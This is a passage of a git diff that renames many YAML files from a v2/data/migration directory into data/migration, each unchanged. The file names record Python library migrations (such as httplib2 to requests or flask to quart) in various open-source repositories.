b/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml similarity index 100% rename from v2/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml rename to data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml diff --git a/v2/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml b/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml similarity index 100% rename from v2/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml rename to data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml diff --git a/v2/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml b/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml similarity index 100% rename from v2/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml rename to data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml diff --git a/v2/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml b/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml similarity index 100% rename from v2/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml rename to data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml diff --git a/v2/data/migration/click__argparse__nodepy@nodepy__715142c.yaml b/data/migration/click__argparse__nodepy@nodepy__715142c.yaml similarity index 100% rename from v2/data/migration/click__argparse__nodepy@nodepy__715142c.yaml rename to data/migration/click__argparse__nodepy@nodepy__715142c.yaml diff --git a/v2/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml b/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml similarity index 100% rename from v2/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml rename to data/migration/click__argparse__titusz@onixcheck__f17d186.yaml diff --git a/v2/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml b/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml similarity index 100% rename from v2/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml rename to data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml diff --git a/v2/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml b/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml similarity index 100% rename from v2/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml rename to data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml diff --git a/v2/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml b/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml similarity index 100% rename from v2/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml rename to data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml diff --git a/v2/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml b/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml rename to data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml diff --git a/v2/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml b/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml rename to data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml diff --git a/v2/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml b/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml rename to data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml diff --git a/v2/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml b/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml rename to data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml diff --git a/v2/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml b/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml rename to data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml diff --git a/v2/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml b/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml rename to data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml diff --git a/v2/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml b/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml rename to data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml b/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml rename to data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml b/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml rename to data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml b/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml rename to data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml diff --git a/v2/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml b/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml similarity index 100% rename from v2/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml rename to data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml diff --git a/v2/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml b/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml similarity index 100% rename from v2/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml rename to data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml diff --git a/v2/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml b/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml similarity index 100% rename from v2/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml rename to data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml diff --git a/v2/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml b/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml similarity index 100% rename from v2/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml rename to data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml diff --git a/v2/data/migration/django__utils__rq@django-rq__310ac1d.yaml b/data/migration/django__utils__rq@django-rq__310ac1d.yaml similarity index 100% rename from v2/data/migration/django__utils__rq@django-rq__310ac1d.yaml rename to data/migration/django__utils__rq@django-rq__310ac1d.yaml diff --git a/v2/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml b/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml rename to data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml diff --git a/v2/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml b/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml rename to data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml diff --git a/v2/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml b/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml rename to data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml diff --git a/v2/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml b/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml similarity index 100% rename from v2/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml rename to data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml diff --git a/v2/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml b/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml similarity index 100% rename from v2/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml rename to data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml diff --git a/v2/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml b/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml similarity index 100% rename from v2/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml rename to data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml diff --git a/v2/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml b/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml similarity index 100% rename from v2/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml rename to data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml diff --git a/v2/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml b/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml rename to data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml diff --git a/v2/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml b/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml rename to data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml diff --git a/v2/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml b/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml rename to data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml diff --git a/v2/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml b/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml rename to data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml diff --git a/v2/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml b/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml similarity index 100% rename from v2/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml rename to data/migration/fabric3__invoke__skoczen@will__437f8be.yaml diff --git a/v2/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml b/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml similarity index 100% rename from v2/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml rename to data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml diff --git a/v2/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml b/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml rename to data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml diff --git a/v2/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml b/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml rename to data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml diff --git a/v2/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml b/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml rename to data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml b/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml rename to data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml b/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml rename to data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml b/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml rename to data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml b/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml rename to data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml diff --git a/v2/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml b/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml similarity index 100% rename from v2/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml rename to data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml diff --git a/v2/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml b/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml similarity index 100% rename from v2/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml rename to data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml diff --git a/v2/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml b/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml similarity index 100% rename from v2/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml rename to data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml diff --git a/v2/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml b/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml similarity index 100% rename from v2/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml rename to data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml diff --git a/v2/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml b/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml similarity index 100% rename from v2/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml rename to data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml diff --git a/v2/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml b/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml similarity index 100% rename from v2/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml rename to data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml diff --git a/v2/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml b/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml similarity index 100% rename from v2/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml rename to data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml diff --git a/v2/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml b/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml similarity index 100% rename from v2/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml rename to data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml diff --git a/v2/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml b/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml similarity index 100% rename from v2/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml rename to data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml diff --git a/v2/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml b/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml similarity index 100% rename from v2/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml rename to data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml diff --git a/v2/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml b/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml similarity index 100% rename from v2/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml rename to data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml diff --git a/v2/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml b/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml similarity index 100% rename from v2/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml rename to data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml similarity index 100% rename from v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml similarity index 100% rename from v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml similarity index 100% rename from v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml diff --git a/v2/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml b/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml similarity index 100% rename from v2/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml rename to data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml diff --git a/v2/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml b/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml similarity index 100% rename from v2/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml rename to data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml diff --git a/v2/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml b/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml rename to data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml diff --git a/v2/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml b/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml rename to data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml diff --git a/v2/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml b/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml rename to data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml diff --git a/v2/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml b/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml rename to data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml diff --git a/v2/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml b/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml rename to data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml diff --git a/v2/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml b/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml similarity index 100% rename from v2/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml rename to data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml diff --git a/v2/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml b/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml similarity index 100% rename from v2/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml rename to data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml diff --git a/v2/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml b/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml similarity index 100% rename from v2/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml rename to data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml diff --git a/v2/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml b/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml similarity index 100% rename from v2/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml rename to data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml diff --git a/v2/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml b/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml rename to data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml diff --git a/v2/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml b/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml rename to data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml diff --git a/v2/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml b/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml rename to data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml diff --git a/v2/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml b/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml rename to data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml diff --git a/v2/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml b/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml rename to data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml diff --git a/v2/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml b/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml rename to data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml diff --git a/v2/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml b/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml rename to data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml diff --git a/v2/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml b/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml rename to data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml diff --git a/v2/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml b/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml rename to data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml diff --git a/v2/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml b/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml similarity index 100% rename from v2/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml rename to data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml diff --git a/v2/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml b/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml similarity index 100% rename from v2/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml rename to data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml diff --git a/v2/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml b/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml similarity index 100% rename from v2/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml rename to data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml diff --git a/v2/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml b/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml similarity index 100% rename from v2/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml rename to data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml diff --git a/v2/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml b/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml similarity index 100% rename from v2/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml rename to data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml diff --git a/v2/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml b/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml similarity index 100% rename from v2/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml rename to data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml diff --git a/v2/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml b/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml similarity index 100% rename from v2/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml rename to data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml diff --git a/v2/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml b/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml similarity index 100% rename from v2/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml rename to data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml diff --git a/v2/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml b/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml similarity index 100% rename from v2/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml rename to data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml diff --git a/v2/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml b/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml similarity index 100% rename from v2/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml rename to data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml b/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml similarity index 100% rename from 